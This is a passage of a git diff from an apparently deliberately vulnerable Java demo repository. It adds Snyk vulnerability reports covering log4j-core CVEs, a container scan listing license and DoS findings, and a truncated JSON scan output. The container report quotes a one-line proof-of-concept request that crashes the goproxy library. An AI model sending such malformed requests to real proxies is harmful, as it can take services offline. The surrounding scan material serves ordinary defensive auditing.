org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high new file mode 100644 index 0000000000..26c833400e --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high @@ -0,0 +1,18 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [] + } + }, + "results": [] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable new file mode 100644 index 0000000000..ac80e180e8 --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable 
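Review bot: The file name `test-vuln.json--fail-on=high` (and `--fail-on=patchable`, `--fail-on=upgradable` at the two following hunks) looks like a `snyk test` invocation in which the `--fail-on` flag was glued onto the output-file argument, so the flag became part of the file name rather than being applied; the three extra files are presumably accidental, and `test-vuln.json` itself is a generated SARIF report rather than source. None of the four belongs in the tree; if a scan result is meant to be retained, have CI publish it as a build artifact instead. The report records `log4j-core@2.14.1` with CVE-2021-44832 reachable from the client `pom.xml`, which is presumably intentional for this module, but a README line saying so would stop a reader from treating the committed report as an open finding.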
@@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable new file mode 100644 index 0000000000..ac80e180e8 --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable 
@@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-server/.dccache b/log4shell-goof/log4shell-server/.dccache new file mode 100644 index 0000000000..56cc634701 --- /dev/null +++ b/log4shell-goof/log4shell-server/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"]} \ No newline at end of file diff --git a/log4shell-goof/test/snyk.html b/log4shell-goof/test/snyk.html new file mode 100644 index 0000000000..a653120f9a --- /dev/null +++ b/log4shell-goof/test/snyk.html @@ -0,0 +1,1600 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+
+ + + Snyk - Open Source Security + + + + + + + +
+

Snyk test report

+ +

May 31st 2024, 2:24:10 pm (UTC+00:00)

+
+
+ Scanned the following paths: +
    +
  • a1doll/k8sreconciler:beta/k8sreconciler (apk)
  • +
  • a1doll/k8sreconciler:beta/usr/app/sec/requirements.txt//usr/app/sec/requirements.txt (pip)
  • +
  • a1doll/k8sreconciler:beta//usr/local/bin/snyk (gomodules)
  • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim (gomodules)
  • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim-runc-v1 (gomodules)
  • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim-runc-v2 (gomodules)
  • +
+
+ +
+
13 known vulnerabilities
+
44 vulnerable dependency paths
+
1191 dependencies
+
+
+
+
+ +
+
+
+

Denial of Service (DoS)

+
+ +
+ high severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Vulnerable module: + + github.com/elazarl/goproxy +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/elazarl/goproxy@v0.0.0-20231031074852-3ec07828be7a + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/elazarl/goproxy@v0.0.0-20231031074852-3ec07828be7a + + + +
  • +
+ +
+ +
+ +

Overview

+

Affected versions of this package are vulnerable to Denial of Service (DoS) via unspecified vectors by sending a malformed request.

+

PoC

+
echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof
+        
+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

+

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

+

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

+

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

+

Two common types of DoS vulnerabilities:

+
    +
  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

    +
  • +
  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

    +
  • +
+

Remediation

+

A fix was pushed into the master branch but not yet published.

+

References

+ + +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/terraform-registry-address +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/terraform-registry-address@v0.1.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/terraform-registry-address@v0.1.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/hcl/v2 +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/hcl/v2@v2.16.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/customdecode@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/tryfunc@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/typeexpr@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/gohcl@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hcldec@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hclparse@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hclsyntax@v2.16.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/json@v2.16.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/hcl +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/hcl@v1.0.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/ast@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/parser@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/printer@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/scanner@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/strconv@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/token@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/parser@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/scanner@v1.0.0 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/token@v1.0.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-version +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-version@v1.6.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-version@v1.6.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-uuid +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-uuid@v1.0.3 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-uuid@v1.0.3 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-safetemp +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-safetemp@v1.0.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-safetemp@v1.0.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-retryablehttp +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-retryablehttp@v0.7.1 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-retryablehttp@v0.7.1 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-multierror +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-multierror@v1.1.1 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-getter +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-getter@v1.7.4 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-getter@v1.7.4 + + + +
  • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-getter/helper/url@v1.7.4 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/go-cleanhttp +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-cleanhttp@v0.5.2 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-cleanhttp@v0.5.2 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
  • +
  • + Package Manager: golang +
  • +
  • + Module: + + github.com/hashicorp/errwrap +
  • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/errwrap@v1.1.0 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
  • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta/usr/app/sec/requirements.txt /usr/app/sec/requirements.txt +
  • +
  • + Package Manager: pip +
  • +
  • + Module: + + certifi +
  • + +
  • Introduced through: + + /usr/app/sec/requirements.txt@* and certifi@2024.2.2 + +
  • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + google-auth@2.29.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + requests-oauthlib@2.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + google-auth@2.29.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + requests-oauthlib@2.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
  • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ + + +
+
+
+
+ + + +
diff --git a/output.json b/output.json
new file mode 100644
index 0000000000..45a7eb4404
--- /dev/null
+++ b/output.json
@@ -0,0 +1,65575 @@ +[ + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + 
"reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": true, + "uniqueCount": 0, + "projectName": "io.github.snyk:java-goof", + "foundProjectCount": 7, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + 
"SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.snyk:log4shell-poc", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 